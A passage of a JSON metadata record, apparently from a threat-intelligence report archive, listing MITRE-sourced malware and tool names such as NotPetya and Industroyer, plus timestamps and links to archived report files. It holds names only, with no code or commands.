				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434529,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e.pdf",
		"text": "https://archive.orkl.eu/04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e.txt",
		"img": "https://archive.orkl.eu/04c5ac3a675ed9ec9d11754dc05abc75c71b0c2e.jpg"
	}
}